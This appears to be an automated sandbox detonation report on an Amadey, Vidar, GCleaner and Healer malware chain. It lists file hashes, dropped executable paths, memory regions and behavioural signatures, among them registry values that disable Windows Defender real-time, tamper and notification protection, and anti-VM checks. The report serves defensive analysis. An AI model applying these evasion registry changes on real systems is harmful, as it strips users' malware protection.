MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/2876-389-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2680-388-0x0000000000FE0000-0x00000000014B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

memory/2680-412-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1368-415-0x0000000000DC0000-0x00000000010EE000-memory.dmp

memory/2680-413-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1452-433-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/1368-432-0x0000000000DC0000-0x00000000010EE000-memory.dmp

memory/1368-431-0x0000000006DF0000-0x000000000711E000-memory.dmp

memory/1228-437-0x0000000000EB0000-0x00000000011DE000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/1652-477-0x0000000006660000-0x0000000006980000-memory.dmp

memory/2680-479-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/3124-478-0x0000000000E00000-0x0000000001120000-memory.dmp

\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

memory/1652-476-0x0000000006660000-0x0000000006980000-memory.dmp

memory/3124-501-0x0000000000E00000-0x0000000001120000-memory.dmp

memory/2680-524-0x0000000006710000-0x0000000006A3E000-memory.dmp

memory/1452-537-0x0000000001270000-0x00000000016C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

MD5 49a690607e1d76e6970b724c4fd22ec7
SHA1 4b670fc77c181e9afb3986729ee3b585bc460c3f
SHA256 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7
SHA512 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b

memory/2680-584-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/1228-586-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/3780-589-0x00000000013C0000-0x00000000016BF000-memory.dmp

memory/2680-588-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-587-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2876-611-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 bd6a9d5ffd2bad77a792a14ab8f2775f
SHA1 9494a453e67cce126bbad031b33325e17deaf374
SHA256 f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498
SHA512 6cd104bf357c61374dde38dce2664a8101b051a9ba47379b762290022a20bbfe00d4f99e2a1d685f81718305b3b6c63fd70d20d46bc1963b737fb6d1ed7efc42

C:\Users\Admin\AppData\Local\Temp\1091742001\b0c35556ec.exe

MD5 1b7c22a214949975556626d7217e9a39
SHA1 d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512 ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

MD5 9d6f03d5a83f9ab0de52c69257720122
SHA1 407ce825de553f856059543cb20c2002f4b2b87d
SHA256 ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6
SHA512 d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db

memory/1228-652-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1228-654-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/1188-656-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1228-653-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/3780-670-0x00000000013C0000-0x00000000016BF000-memory.dmp

memory/2680-702-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2680-721-0x00000000060D0000-0x00000000063CF000-memory.dmp

memory/2680-722-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-723-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1228-724-0x0000000006E30000-0x0000000007290000-memory.dmp

memory/1228-725-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-727-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-730-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 738b0ee088c4454612ca08bd68ff3db8
SHA1 af6ed558fc5daebccb1e4fa96cbaab2867ed8920
SHA256 caf2043f1d8c51b1c2a16dc58552bb6e73a8794d0d24b0389716313ae52c12b0
SHA512 50f608b38e8975d97dfc389d297a9615beada8fd2a43f7a9053d9f142dd292fef49f873d44b51952deea566b2f05fb8d69b5557c150f45af5e18ca2f583d53b5

C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe

MD5 cf6bd1302ab35c1275fedadbabde12fa
SHA1 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1
SHA256 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7
SHA512 c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04

memory/2680-764-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-783-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2876-805-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1228-806-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-807-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-808-0x0000000000400000-0x0000000000860000-memory.dmp

memory/1644-809-0x0000000000910000-0x0000000001554000-memory.dmp

memory/2444-810-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2444-812-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1644-811-0x0000000000910000-0x0000000001554000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe

MD5 639af76cb7333cbd609da5d52a6e195b
SHA1 a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483
SHA256 a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8
SHA512 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51

memory/2680-826-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2444-830-0x0000000010000000-0x000000001001C000-memory.dmp

memory/1228-834-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-836-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-837-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe

MD5 75dd7a91559a030b7c608e32474413d0
SHA1 a2f27e1caa02eda2e33577e530b9538b31ac6626
SHA256 d4ad9f72eb0ec01c9b73ad3a798c19496d639ab67dc963acf1cfc8e59b869f95
SHA512 a98b44e762d26050be8cd11fd2bc7609f8ac5cadf36bdb49b3c205ed30b1dfc2c77a59da6472a06766d629db0c283728bad6ff8a6d24a3c5dda6ba5b0888fdc5

memory/3492-855-0x0000000000360000-0x0000000000D98000-memory.dmp

memory/2680-854-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/624-858-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3492-857-0x0000000000360000-0x0000000000D98000-memory.dmp

memory/2908-860-0x0000000000AA0000-0x0000000000DA8000-memory.dmp

memory/1228-863-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-864-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-871-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2680-877-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/1228-881-0x0000000000EB0000-0x00000000011DE000-memory.dmp

memory/1188-882-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2592-884-0x0000000000400000-0x0000000000860000-memory.dmp

memory/2680-894-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/1188-902-0x0000000000400000-0x0000000000860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe

MD5 db3632ef37d9e27dfa2fd76f320540ca
SHA1 f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA256 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA512 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe

MD5 f071beebff0bcff843395dc61a8d53c8
SHA1 82444a2bba58b07cb8e74a28b4b0f715500749b2
SHA256 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA512 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

memory/880-961-0x0000000001080000-0x0000000001130000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 13:24

Reported

2025-02-24 13:26

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
